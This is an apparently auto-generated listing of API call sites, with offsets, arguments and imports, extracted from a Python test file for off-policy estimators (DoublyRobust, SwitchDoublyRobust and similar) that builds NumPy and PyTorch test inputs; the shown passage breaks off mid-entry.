'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (812, 821), False, 'from conftest import generate_action_dist\n'), ((845, 867), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (853, 867), True, 'import numpy as np\n'), ((877, 887), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (884, 887), True, 'import numpy as np\n'), ((897, 924), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (913, 924), True, 'import numpy as np\n'), ((934, 953), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (942, 953), True, 'import numpy as np\n'), ((1010, 1039), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1030, 1039), False, 'from conftest import generate_action_dist\n'), ((1049, 1071), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1057, 1071), True, 'import numpy as np\n'), ((1095, 1105), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (1102, 1105), True, 'import numpy as np\n'), ((1115, 1142), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (1131, 1142), True, 'import numpy as np\n'), ((1152, 1171), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (1160, 1171), True, 'import numpy as np\n'), ((1228, 1257), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1248, 1257), False, 'from conftest import generate_action_dist\n'), ((1267, 1289), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1275, 1289), True, 'import numpy as np\n'), ((1299, 1321), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1307, 1321), True, 'import numpy as np\n'), ((1345, 1372), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (1361, 1372), True, 'import numpy as np\n'), ((1382, 1401), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (1390, 1401), True, 'import numpy as np\n'), ((1458, 1487), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1478, 1487), False, 'from conftest import generate_action_dist\n'), ((1497, 1519), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1505, 1519), True, 'import numpy as np\n'), ((1529, 1551), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1537, 1551), True, 'import numpy as np\n'), ((1561, 1571), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (1568, 1571), True, 'import numpy as np\n'), ((1581, 1608), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (1597, 1608), True, 'import numpy as np\n'), ((1703, 1732), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1723, 1732), False, 'from conftest import generate_action_dist\n'), ((1742, 1766), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'float'}), '(5, dtype=float)\n', (1750, 1766), True, 'import numpy as np\n'), ((1776, 1798), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (1784, 1798), True, 'import numpy as np\n'), ((1808, 1818), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (1815, 1818), True, 'import numpy as np\n'), ((1828, 1855), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (1844, 1855), True, 'import numpy as np\n'), ((1865, 1884), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (1873, 1884), True, 'import numpy as np\n'), ((1964, 1993), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (1984, 1993), False, 'from conftest import generate_action_dist\n'), ((2039, 2061), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2047, 2061), True, 'import numpy as np\n'), ((2071, 2081), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (2078, 2081), True, 'import numpy as np\n'), ((2091, 2118), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (2107, 2118), True, 'import numpy as np\n'), ((2128, 2147), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (2136, 2147), True, 'import numpy as np\n'), ((2227, 2256), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (2247, 2256), False, 'from conftest import generate_action_dist\n'), ((2279, 2301), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2287, 2301), True, 'import numpy as np\n'), ((2311, 2321), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (2318, 2321), True, 'import numpy as np\n'), ((2331, 2358), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (2347, 2358), True, 'import numpy as np\n'), ((2368, 2387), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (2376, 2387), True, 'import numpy as np\n'), ((2444, 2473), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (2464, 2473), False, 'from conftest import generate_action_dist\n'), ((2483, 2510), 'numpy.zeros', 'np.zeros', (['(3, 2)'], {'dtype': 'int'}), '((3, 2), dtype=int)\n', (2491, 2510), True, 'import numpy as np\n'), ((2520, 2542), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2528, 2542), True, 'import numpy as np\n'), ((2552, 2562), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (2559, 2562), True, 'import numpy as np\n'), ((2572, 2599), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (2588, 2599), True, 'import numpy as np\n'), ((2609, 2628), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (2617, 2628), True, 'import numpy as np\n'), ((2691, 2720), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (2711, 2720), False, 'from conftest import generate_action_dist\n'), ((2766, 2788), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2774, 2788), True, 'import numpy as np\n'), ((2798, 2808), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (2805, 2808), True, 'import numpy as np\n'), ((2818, 2845), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (2834, 2845), True, 'import numpy as np\n'), ((2855, 2874), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (2863, 2874), True, 'import numpy as np\n'), ((2981, 3010), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3001, 3010), False, 'from conftest import generate_action_dist\n'), ((3020, 3042), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3028, 3042), True, 'import numpy as np\n'), ((3065, 3075), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (3072, 3075), True, 'import numpy as np\n'), ((3085, 3112), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (3101, 3112), True, 'import numpy as np\n'), ((3122, 3141), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (3130, 3141), True, 'import numpy as np\n'), ((3198, 3227), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3218, 3227), False, 'from conftest import generate_action_dist\n'), ((3237, 3259), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3245, 3259), True, 'import numpy as np\n'), ((3269, 3296), 'numpy.zeros', 'np.zeros', (['(3, 2)'], {'dtype': 'int'}), '((3, 2), dtype=int)\n', (3277, 3296), True, 'import numpy as np\n'), ((3306, 3316), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (3313, 3316), True, 'import numpy as np\n'), ((3326, 3353), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (3342, 3353), True, 'import numpy as np\n'), ((3363, 3382), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (3371, 3382), True, 'import numpy as np\n'), ((3445, 3474), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3465, 3474), False, 'from conftest import generate_action_dist\n'), ((3484, 3506), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3492, 3506), True, 'import numpy as np\n'), ((3516, 3538), 'numpy.zeros', 'np.zeros', (['(4)'], {'dtype': 'int'}), '(4, dtype=int)\n', (3524, 3538), True, 'import numpy as np\n'), ((3548, 3558), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (3555, 3558), True, 'import numpy as np\n'), ((3568, 3595), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (3584, 3595), True, 'import numpy as np\n'), ((3605, 3624), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (3613, 3624), True, 'import numpy as np\n'), ((3699, 3728), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3719, 3728), False, 'from conftest import generate_action_dist\n'), ((3738, 3760), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3746, 3760), True, 'import numpy as np\n'), ((3770, 3792), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3778, 3792), True, 'import numpy as np\n'), ((3815, 3842), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (3831, 3842), True, 'import numpy as np\n'), ((3852, 3871), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (3860, 3871), True, 'import numpy as np\n'), ((3928, 3957), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (3948, 3957), False, 'from conftest import generate_action_dist\n'), ((3967, 3989), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (3975, 3989), True, 'import numpy as np\n'), ((3999, 4021), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4007, 4021), True, 'import numpy as np\n'), ((4031, 4046), 'numpy.ones', 'np.ones', (['(5, 3)'], {}), '((5, 3))\n', (4038, 4046), True, 'import numpy as np\n'), ((4056, 4083), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (4072, 4083), True, 'import numpy as np\n'), ((4093, 4112), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (4101, 4112), True, 'import numpy as np\n'), ((4175, 4204), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (4195, 4204), False, 'from conftest import generate_action_dist\n'), ((4214, 4236), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4222, 4236), True, 'import numpy as np\n'), ((4246, 4268), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4254, 4268), True, 'import numpy as np\n'), ((4278, 4288), 'numpy.ones', 'np.ones', (['(4)'], {}), '(4)\n', (4285, 4288), True, 'import numpy as np\n'), ((4298, 4325), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (4314, 4325), True, 'import numpy as np\n'), ((4335, 4354), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (4343, 4354), True, 'import numpy as np\n'), ((4438, 4467), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (4458, 4467), False, 'from conftest import generate_action_dist\n'), ((4477, 4499), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4485, 4499), True, 'import numpy as np\n'), ((4509, 4531), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4517, 4531), True, 'import numpy as np\n'), ((4541, 4553), 'numpy.arange', 'np.arange', (['(5)'], {}), '(5)\n', (4550, 4553), True, 'import numpy as np\n'), ((4563, 4590), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (4579, 4590), True, 'import numpy as np\n'), ((4600, 4619), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (4608, 4619), True, 'import numpy as np\n'), ((4677, 4706), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (4697, 4706), False, 'from conftest import generate_action_dist\n'), ((4716, 4738), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4724, 4738), True, 'import numpy as np\n'), ((4748, 4770), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (4756, 4770), True, 'import numpy as np\n'), ((4780, 4790), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (4787, 4790), True, 'import numpy as np\n'), ((4800, 4827), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (4816, 4827), True, 'import numpy as np\n'), ((4837, 4856), 'numpy.zeros', 'np.zeros', (['(5, 4, 2)'], {}), '((5, 4, 2))\n', (4845, 4856), True, 'import numpy as np\n'), ((4965, 4994), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (4985, 4994), False, 'from conftest import generate_action_dist\n'), ((5004, 5026), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (5012, 5026), True, 'import numpy as np\n'), ((5036, 5058), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (5044, 5058), True, 'import numpy as np\n'), ((5068, 5078), 'numpy.ones', 'np.ones', (['(5)'], {}), '(5)\n', (5075, 5078), True, 'import numpy as np\n'), ((5088, 5115), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (5104, 5115), True, 'import numpy as np\n'), ((6686, 6719), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (6697, 6719), False, 'import torch\n'), ((6729, 6742), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (6739, 6742), False, 'import torch\n'), ((6807, 6829), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (6818, 6829), False, 'import torch\n'), ((6942, 6975), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (6953, 6975), False, 'import torch\n'), ((6999, 7012), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (7009, 7012), False, 'import torch\n'), ((7077, 7099), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (7088, 7099), False, 'import torch\n'), ((7212, 7245), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7223, 7245), False, 'import torch\n'), ((7255, 7288), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7266, 7288), False, 'import torch\n'), ((7367, 7389), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (7378, 7389), False, 'import torch\n'), ((7502, 7535), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7513, 7535), False, 'import torch\n'), ((7545, 7578), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7556, 7578), False, 'import torch\n'), ((7588, 7601), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (7598, 7601), False, 'import torch\n'), ((7807, 7842), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.float32'}), '(5, dtype=torch.float32)\n', (7818, 7842), False, 'import torch\n'), ((7852, 7885), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (7863, 7885), False, 'import torch\n'), ((7895, 7908), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (7905, 7908), False, 'import torch\n'), ((7973, 7995), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (7984, 7995), False, 'import torch\n'), ((8179, 8212), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (8190, 8212), False, 'import torch\n'), ((8222, 8235), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (8232, 8235), False, 'import torch\n'), ((8300, 8322), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (8311, 8322), False, 'import torch\n'), ((8472, 8505), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (8483, 8505), False, 'import torch\n'), ((8515, 8528), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (8525, 8528), False, 'import torch\n'), ((8593, 8615), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (8604, 8615), False, 'import torch\n'), ((8728, 8766), 'torch.zeros', 'torch.zeros', (['(3, 2)'], {'dtype': 'torch.int64'}), '((3, 2), dtype=torch.int64)\n', (8739, 8766), False, 'import torch\n'), ((8776, 8809), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (8787, 8809), False, 'import torch\n'), ((8819, 8832), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (8829, 8832), False, 'import torch\n'), ((8897, 8919), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (8908, 8919), False, 'import torch\n'), ((9086, 9119), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9097, 9119), False, 'import torch\n'), ((9129, 9142), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (9139, 9142), False, 'import torch\n'), ((9207, 9229), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (9218, 9229), False, 'import torch\n'), ((9393, 9426), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9404, 9426), False, 'import torch\n'), ((9449, 9462), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (9459, 9462), False, 'import torch\n'), ((9527, 9549), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (9538, 9549), False, 'import torch\n'), ((9662, 9695), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9673, 9695), False, 'import torch\n'), ((9705, 9743), 'torch.zeros', 'torch.zeros', (['(3, 2)'], {'dtype': 'torch.int64'}), '((3, 2), dtype=torch.int64)\n', (9716, 9743), False, 'import torch\n'), ((9753, 9766), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (9763, 9766), False, 'import torch\n'), ((9831, 9853), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (9842, 9853), False, 'import torch\n'), ((9973, 10006), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9984, 10006), False, 'import torch\n'), ((10016, 10049), 'torch.zeros', 'torch.zeros', (['(4)'], {'dtype': 'torch.int64'}), '(4, dtype=torch.int64)\n', (10027, 10049), False, 'import torch\n'), ((10059, 10072), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (10069, 10072), False, 'import torch\n'), ((10137, 10159), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (10148, 10159), False, 'import torch\n'), ((10291, 10324), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10302, 10324), False, 'import torch\n'), ((10334, 10367), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10345, 10367), False, 'import torch\n'), ((10445, 10467), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (10456, 10467), False, 'import torch\n'), ((10580, 10613), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10591, 10613), False, 'import torch\n'), ((10623, 10656), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10634, 10656), False, 'import torch\n'), ((10666, 10684), 'torch.ones', 'torch.ones', (['(5, 3)'], {}), '((5, 3))\n', (10676, 10684), False, 'import torch\n'), ((10749, 10771), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (10760, 10771), False, 'import torch\n'), ((10891, 10924), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10902, 10924), False, 'import torch\n'), ((10934, 10967), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10945, 10967), False, 'import torch\n'), ((10977, 10990), 'torch.ones', 'torch.ones', (['(4)'], {}), '(4)\n', (10987, 10990), False, 'import torch\n'), ((11055, 11077), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (11066, 11077), False, 'import torch\n'), ((11218, 11251), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11229, 11251), False, 'import torch\n'), ((11261, 11294), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11272, 11294), False, 'import torch\n'), ((11399, 11421), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (11410, 11421), False, 'import torch\n'), ((11536, 11569), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11547, 11569), False, 'import torch\n'), ((11579, 11612), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11590, 11612), False, 'import torch\n'), ((11622, 11635), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (11632, 11635), False, 'import torch\n'), ((11700, 11722), 'torch.zeros', 'torch.zeros', (['(5, 4, 2)'], {}), '((5, 4, 2))\n', (11711, 11722), False, 'import torch\n'), ((11888, 11921), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11899, 11921), False, 'import torch\n'), ((11931, 11964), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11942, 11964), False, 'import torch\n'), ((11974, 11987), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (11984, 11987), False, 'import torch\n'), ((13450, 13500), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (13463, 13500), False, 'import pytest\n'), ((13514, 13541), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': 'tau'}), '(tau=tau)\n', (13532, 13541), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((14243, 14293), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (14256, 14293), False, 'import pytest\n'), ((14307, 14349), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': 'lambda_'}), '(lambda_=lambda_)\n', (14332, 14349), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((14724, 14753), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (14744, 14753), False, 'from conftest import generate_action_dist\n'), ((14763, 14790), 'numpy.random.choice', 'np.random.choice', (['(4)'], {'size': '(5)'}), '(4, size=5)\n', (14779, 14790), True, 'import numpy as np\n'), ((14800, 14822), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (14808, 14822), True, 'import numpy as np\n'), ((14832, 14876), 'numpy.random.uniform', 'np.random.uniform', ([], {'low': '(0.5)', 'high': '(1.0)', 'size': '(5)'}), '(low=0.5, high=1.0, size=5)\n', (14849, 14876), True, 'import numpy as np\n'), ((14886, 14913), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (14902, 14913), True, 'import numpy as np\n'), ((14923, 14942), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (14931, 14942), True, 'import numpy as np\n'), ((16181, 16214), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (16192, 16214), False, 'import torch\n'), ((16351, 16373), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (16362, 16373), False, 'import torch\n'), ((23912, 23950), 'numpy.abs', 'np.abs', (['(dr_value - dr_shrink_max_value)'], {}), '(dr_value - dr_shrink_max_value)\n', (23918, 23950), True, 'import numpy as np\n'), ((2003, 2025), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2011, 2025), True, 'import numpy as np\n'), ((2730, 2752), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2738, 2752), True, 'import numpy as np\n'), ((5712, 5762), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (5725, 5762), False, 'import pytest\n'), ((6088, 6138), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (6101, 6138), False, 'import pytest\n'), ((6632, 6661), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (6652, 6661), False, 'from conftest import generate_action_dist\n'), ((6769, 6796), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (6785, 6796), True, 'import numpy as np\n'), ((6902, 6931), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (6922, 6931), False, 'from conftest import generate_action_dist\n'), ((7039, 7066), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (7055, 7066), True, 'import numpy as np\n'), ((7172, 7201), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (7192, 7201), False, 'from conftest import generate_action_dist\n'), ((7329, 7356), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (7345, 7356), True, 'import numpy as np\n'), ((7462, 7491), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (7482, 7491), False, 'from conftest import generate_action_dist\n'), ((7628, 7655), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (7644, 7655), True, 'import numpy as np\n'), ((7767, 7796), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (7787, 7796), False, 'from conftest import generate_action_dist\n'), ((7935, 7962), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, 